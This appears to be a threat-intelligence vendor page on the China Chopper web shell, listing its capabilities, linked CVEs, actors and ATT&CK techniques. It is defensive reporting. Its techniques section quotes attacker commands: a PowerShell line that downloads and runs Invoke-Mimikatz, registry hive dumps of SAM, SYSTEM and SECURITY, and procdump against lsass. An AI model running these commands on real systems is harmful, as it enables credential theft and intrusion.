China Chopper is a widely reused web shell used to maintain remote access to compromised web servers and execute post-compromise actions through standard web traffic. It is commonly deployed after exploitation of internet-facing applications, particularly Microsoft Exchange and SharePoint, and has also been observed in broader compromises involving IIS-hosted environments. The malware is notable for a lightweight server-side component that accepts attacker-supplied code over HTTP POST and a client component used to manage the implant.
China Chopper supports remote command execution, file upload and download, directory listing, and modification of file timestamps to reduce forensic visibility. Reported variants and deployments also show use for brute-force password guessing against authentication portals and discovery of exposed services or login interfaces. In real-world intrusions it is frequently used as an initial foothold after exploitation, then leveraged for reconnaissance, credential access, lateral movement support, exfiltration, and delivery of additional tooling.
The web shell has been repeatedly associated with Chinese state-linked and China-nexus intrusion activity, but it is not exclusive to any single actor and is broadly reused across espionage, financially motivated, and opportunistic campaigns. It has been observed in operations attributed or linked to groups such as HAFNIUM, Flax Typhoon, Soft Cell, and other China-aligned clusters, as well as in mass exploitation waves where many unrelated actors deployed it at scale. During the 2021 ProxyLogon exploitation surge, China Chopper was one of the most commonly installed web shells on compromised on-premises Microsoft Exchange servers worldwide.
China Chopper primarily targets Windows-based web server environments, especially IIS and ASPX/JScript deployments, though the family is broadly discussed as an off-the-shelf web shell reused across multiple server technologies. It remains significant because of its simplicity, ubiquity, and utility as a low-friction persistence and post-exploitation mechanism on externally exposed enterprise servers.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
17 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2021-27065 (CVSS 7.8) is a post-authentication arbitrary file write vulnerability in Exchange. If the threat actor first authenticates with the Exchange server they could then use this vulnerability to write a file to any path on the server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
ProxyNotShell Exchange vulnerabilities (CVE-2022-41040 [CVSS:8.8], CVE-2022-41082 [CVSS:8.0])... CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, that would allow an attacker to run PowerShell in the context of the compromised system. | In known real-world attacks, threat actors have exploited the pair of vulnerabilities to deploy the China Chopper webshell on impacted Microsoft Exchange servers.
ProxyNotShell Exchange vulnerabilities (CVE-2022-41040 [CVSS:8.8], CVE-2022-41082 [CVSS:8.0])... CVE-2022-41082 allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker. | In known real-world attacks, threat actors have exploited the pair of vulnerabilities to deploy the China Chopper webshell on impacted Microsoft Exchange servers.
CVE-2021-26857 (CVSS 7.8) is an insecure deserialization vulnerability in the Unified Messaging service. Exploiting this vulnerability gives the threat actor the ability to run code as SYSTEM on the Exchange server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
eSentire is aware of reports of the widespread exploitation of the critical NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) vulnerability CVE-2023-3519 (CVSS: 9.8). It is a Remote Code Execution (RCE) vulnerability that may be exploited by a remote and unauthenticated threat actor to achieve code execution. | Shadowserver has confirmed that attacks resulted in the deployment of the ChinaChopper webshell, a tool known to be used by Chinese affiliated threat actor groups in attacks related to both espionage and ransomware deployment.
CVE-2021-26855 (CVSS 9.1) is a server-side request forgery (SSRF) vulnerability in Exchange that allows the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
On June 2nd, 2022, Atlassian disclosed a critical vulnerability impacting the Confluence collaboration tool, tracked as CVE-2022-26134; active exploitation of the vulnerability has been confirmed. CVE-2022-26134 is an unauthenticated Remote Code Execution (RCE) vulnerability that impacts all supported versions of Confluence Server and Data Center. | Attacks observed by Volexity resulted in the deployment of the open-source webshell BEHINDER, a file upload webshell, and the China Chopper webshell.
CVE-2021-26858 (CVSS 7.8) is a post-authentication arbitrary file write vulnerability in Exchange. If the threat actor first authenticates with the Exchange server they could then use this vulnerability to write a file to any path on the server. | Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper Mitigation: Update affected Microsoft products with the latest security patches | CVE-2019-0604 Vulnerable Products: Microsoft SharePoint Associated Malware: China Chopper
Microsoft Exchange Server ... China Chopper webshell was installed after above activities ... Exploiting ProxyShell vulnerability | China Chopper webshell was installed after above activities
China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062, CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server. | China Chopper is a web shell that allows attackers to retain access to an infected system using a client side application which contains all the logic required to control the target.
CVE-2021-27857: Is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability. | The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant... The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.
23 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Like many Chinese APT groups, analysts have observed Flax Typhoon using the “China Chopper” web shell.
Palo Alto reported their observations of wide-spread installations of the China Chopper webshell.
Initial access: The attackers deployed the following China Chopper, JspSpy webshells to obtain a foothold on the victim’s network that they used to execute commands to upload files to the target machines.
24 distinct techniques documented for this family, organized by ATT&CK tactic.
Limited exploitation of these vulnerabilities has been ongoing since at least September 2022. | CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability, that would allow an attacker to run PowerShell in the context of the compromised system.
A web shell provides an operator with a way to execute commands (input) and receive its results (output) on a target system.
event_log_source:'Security' AND event_id:'4688' AND proc_parent_file_path end with:'\w3wp.exe' AND proc_file_path end with:('\cmd.exe' OR '\powershell.exe')
The content repeatedly describes threat actors and malware using cmd.exe, the Windows command shell, to execute commands, launch payloads, run batch files, and automate actions on compromised hosts.
CVE-2022-26134 is an unauthenticated Remote Code Execution (RCE) vulnerability that impacts all supported versions of Confluence Server and Data Center. Exploitation of this vulnerability would allow an unauthenticated and remote actor to execute code on vulnerable devices
In observed incidents, threat actors were identified exploiting CVE-2023-3519 to deliver webshells to victim devices. | Shadowserver has confirmed that attacks resulted in the deployment of the ChinaChopper webshell, a tool known to be used by Chinese affiliated threat actor groups
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz | reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive ... Invoke-Mimikatz ... The attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory.
The following commands were observed on a PowerShell session obtained by the exploit ... ipconfig /all
Andariel has collected large numbers of files from compromised network systems for later extraction... APT28 has retrieved internal documents from machines inside victim environments... BADNEWS crawls the victim's local drives and collects documents... many listed groups and malware collect files, documents, credentials, payment card data, or other information from compromised hosts.
They leverage the existing web server process and network ports, blending into legitimate HTTP/S traffic.
139 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
129 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Lightweight web shell referenced as a common reusable attacker tool for remote access and command execution.
A widely reused generic web shell used as a comparison baseline for more application-specific implants.
A widely used webshell installed on vulnerable Exchange servers to provide backdoor access after exploitation.
A webshell client/management tool associated with lightweight 'OneShell' server-side implants and widely used to operate compromised web servers.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.